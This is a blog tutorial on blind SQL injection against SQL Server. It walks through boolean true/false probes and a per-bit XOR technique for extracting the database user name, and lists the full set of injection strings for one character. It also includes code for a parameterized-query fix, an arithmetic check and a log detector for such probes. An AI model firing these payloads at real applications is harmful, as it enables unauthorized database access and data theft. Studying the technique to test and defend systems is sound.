Blind Sql Injection – Data Extraction Part 1

This article gives an overview of how data is extracted when an application has a blind SQL injection vulnerability.

Assuming you already have some knowledge of SQL injection (SQLi) and how to identify it, I will jump straight to data extraction.

As you all know, SQL injection is an attack where user-supplied SQL fragments get executed to perform unintended operations, blah blah… For a proper definition, please refer to the OWASP website. 🙂

In blind SQL injection, an attacker injects SQL and steals data by asking the database a series of true-or-false questions through SQL statements.

Example:

Suppose an application takes the user input and builds a SQL query as below:

Sqlquery = "select * from users where username = '" + txtusername.text + "'"

If the user enters "john' and 1=1--" (the double quotes are not part of the input),

the final query will look like this:

select * from users where username = 'john' and 1=1--

This still returns the results for user john: "and 1=1" is always true, and "--" comments out the trailing quote the application appended.

In the above example, if the user instead enters "john' and 1=0--" in the search text box, the query becomes:

select * from users where username = 'john' and 1=0--

So here we have two queries: one returns the data for user "john" and the other returns nothing. Using these two conditions, the attacker is able to extract data from the database.
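As an added example (not code from the article), the concatenation above beside its parameterized fix, run against a constructed SQLite table in place of the application's users table. The point to notice is that the two inputs forming the article's true/false pair behave differently only in the concatenated version; the parameterized query gives the same answer for both, so there is no oracle to ask.

```python
import sqlite3

# Constructed sample data standing in for the application's "users" table.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, role text)")
    conn.executemany("insert into users values (?, ?)",
                     [("john", "staff"), ("scott", "dba")])
    return conn

def lookup_concatenated(conn: sqlite3.Connection, txtusername: str) -> list:
    """Mirrors the article's vulnerable construction: the input is pasted into the SQL text,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sqlquery = "select * from users where username = '" + txtusername + "'"
    return conn.execute(sqlquery).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, txtusername: str) -> list:
    """Hardened form: the value travels separately from the statement and is only ever
    compared as data, never parsed as SQL."""
    return conn.execute("select * from users where username = ?",
                        (txtusername,)).fetchall()

def compare(inputs) -> dict:
    """Row counts (concatenated, parameterized) for each input string."""
    conn = make_db()
    return {s: (len(lookup_concatenated(conn, s)), len(lookup_parameterized(conn, s)))
            for s in inputs}

if __name__ == "__main__":
    for s, (vuln, safe) in compare(["john", "john' and 1=1--", "john' and 1=0--"]).items():
        print(f"{s!r:24} concatenated={vuln} parameterized={safe}")
```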

Data Extraction

Now the question is: how can we extract data from the database using only true-or-false conditions? To answer that, we first need to understand how computers handle data internally.

In a computer, all data is handled as 1s and 0s, i.e. binary. The character "A" is represented by the ASCII value 65, whose binary representation is 01000001.

In blind SQL injection, we determine the value of one bit per request and construct the character once we have all 8 bits. So we need 8 requests to get one character from the database.

Let us see how this is done.

Assume we are working against a SQL Server database and want to extract the database user name under which the SQL queries are being run.

SQL Server provides this as a built-in value; it can be retrieved with the query:

select user

Let us assume the above query returns "scott" (this is just for understanding; in practice we do not know in advance what the query will return).

To get the first character of user, the query can be written as:

select substring(user,1,1)

That gives the first character; now how do we get the ASCII value of that character?

select ascii(substring(user,1,1))

The ASCII value of "s" is 115, binary 01110011.

We try some exclusive-or (XOR) operations on the ASCII value and see what the results are:

115 XOR 1 = 114 (01110010)

115 XOR 2 = 113 (01110001)

115 XOR 4 = 119 (01110111)

115 XOR 8 = 123 (01111011)

115 XOR 16 = 99 (01100011)

115 XOR 32 = 83 (01010011)

115 XOR 64 = 51 (00110011)

115 XOR 128 = 243 (11110011)

The reason we use 1, 2, 4, 8, etc. for the XOR is that their binary representations have a 0 in every position except one, and that one position selects the bit whose value we are trying to retrieve.

If you observe the XOR output above, whenever the actual ASCII value had a 1 in the selected bit position the XORed value is smaller than 115, and when that bit is 0 the XORed value is larger than 115. Based on this inference I can build my query as:

select case when ascii(substring(user,1,1)) ^ 1 > ascii(substring(user,1,1)) then 0 else 1 end

^ is the bitwise XOR operator in SQL Server.

So in the search field of the application we enter the following search string (the subquery needs parentheses to be valid T-SQL):

john' and 1=(select case when ascii(substring(user,1,1)) ^ 1 > ascii(substring(user,1,1)) then 0 else 1 end)--

If you look at the condition above, whether it reduces to 1=0 or 1=1 depends on the bit value of the data we are trying to retrieve.

If we send the following search strings to the database:

john' and 1=(select case when ascii(substring(user,1,1)) ^ 1 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 2 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 4 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 8 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 16 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 32 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 64 > ascii(substring(user,1,1)) then 0 else 1 end)--

john' and 1=(select case when ascii(substring(user,1,1)) ^ 128 > ascii(substring(user,1,1)) then 0 else 1 end)--

we can determine all 8 bits; once we have all 8 bits we get the ASCII value, and from the ASCII value the character.
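As an added example (not the article's own code), the XOR inference and the bit-to-character reconstruction above checked with plain arithmetic: it reproduces the article's XOR table for 115, verifies that a single-bit XOR lowers the value exactly when that bit is 1 for every byte (not just for "s"), and rebuilds the character from eight 0/1 answers the way the article describes. Nothing here talks to a database; db_answer is a local stand-in for what the case expression evaluates to.

```python
MASKS = [1 << k for k in range(8)]  # 1, 2, 4, ..., 128: exactly one bit set each

def xor_table(value: int) -> list:
    """The article's table: (mask, value XOR mask, 8-bit binary string) for each mask."""
    return [(m, value ^ m, format(value ^ m, "08b")) for m in MASKS]

def db_answer(value: int, mask: int) -> int:
    """Local stand-in for 'case when value ^ mask > value then 0 else 1 end'."""
    return 0 if (value ^ mask) > value else 1

def inference_holds_for_all_bytes() -> bool:
    """XOR with a single-bit mask lowers the value iff that bit is 1.
    Reason: flipping a 1 to 0 subtracts the mask, flipping a 0 to 1 adds it."""
    return all(db_answer(v, m) == (1 if v & m else 0)
               for v in range(256) for m in MASKS)

def char_from_answers(answers) -> str:
    """Rebuild the character from eight 0/1 answers, answers[k] belonging to mask 1 << k."""
    if len(answers) != 8:
        raise ValueError("one answer per bit is required")
    return chr(sum(m for m, a in zip(MASKS, answers) if a))

if __name__ == "__main__":
    for mask, result, bits in xor_table(115):
        print(f"115 XOR {mask:<3} = {result:<3} ({bits})")
    print("inference holds for all bytes:", inference_holds_for_all_bytes())
    answers = [db_answer(115, m) for m in MASKS]   # what eight probes would return for "s"
    print("answers:", answers, "->", char_from_answers(answers))
```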

Once we have the first character, we change substring(user,1,1) to substring(user,2,1) to get the 2nd character and repeat the steps.

In this fashion we extract data from the database bit by bit, so you need a lot of patience… The next part will cover a quicker way of data extraction… wait for part 2 🙂
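From the defender's side, the 8-requests-per-character pattern above is very visible in web server logs: one client repeating the same ascii(substring(...)) comparison while only the single-bit mask changes. As an added example (not part of the article), a small detector over constructed access-log lines in a hypothetical layout (client IP, quoted request line, status, bytes); the probe strings in the sample log are the article's own, URL-encoded, and the threshold is a chosen value.

```python
import re
from collections import defaultdict
from urllib.parse import quote_plus, unquote_plus

# Hypothetical log layout for this example: <ip> "<method> <path> HTTP/x" <status> <bytes>
LINE_RE = re.compile(r'^(\S+) "\w+ (\S+) HTTP/[\d.]+" (\d{3}) (\d+)$')
# The article's probe shape: ascii(substring(<col>,<pos>,1)) ^ <mask>
PROBE_RE = re.compile(
    r"ascii\s*\(\s*substring\s*\(\s*\w+\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*\^\s*(\d+)", re.I)
MIN_DISTINCT_MASKS = 3  # chosen threshold: three different single-bit masks from one client

def detect_bit_probing(lines) -> dict:
    """Return {ip: {"positions": [...], "masks": [...]}} for clients walking bits."""
    seen = defaultdict(lambda: {"positions": set(), "masks": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path = m.group(1), m.group(2)
        query = unquote_plus(path.partition("?")[2])   # decode %27, %5E, '+' etc.
        for pos, mask in PROBE_RE.findall(query):
            mask = int(mask)
            if mask and (mask & (mask - 1)) == 0:       # power of two: 1, 2, 4, ..., 128
                seen[ip]["positions"].add(int(pos))
                seen[ip]["masks"].add(mask)
    return {ip: {"positions": sorted(v["positions"]), "masks": sorted(v["masks"])}
            for ip, v in seen.items() if len(v["masks"]) >= MIN_DISTINCT_MASKS}

# Constructed sample log: one normal search, five of the article's probes, one benign '^'.
PROBE = ("john' and 1=(select case when ascii(substring(user,1,1)) ^ {m} > "
         "ascii(substring(user,1,1)) then 0 else 1 end)--")

def constructed_log() -> list:
    lines = ['10.0.0.5 "GET /search?q=john HTTP/1.1" 200 1843']
    for m in (1, 2, 4, 8, 16):
        lines.append(f'10.0.0.9 "GET /search?q={quote_plus(PROBE.format(m=m))} HTTP/1.1" 200 1843')
    lines.append('10.0.0.7 "GET /search?q=2%5E8+calculator HTTP/1.1" 200 990')
    return lines

if __name__ == "__main__":
    for ip, info in detect_bit_probing(constructed_log()).items():
        print(f"{ip}: bit probes on character position(s) {info['positions']}, masks {info['masks']}")
```

Real deployments would also key on the response size or status flipping between the two states the article describes, since that is the channel the answers come back over.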

Posted on January 31, 2012 in web application hacking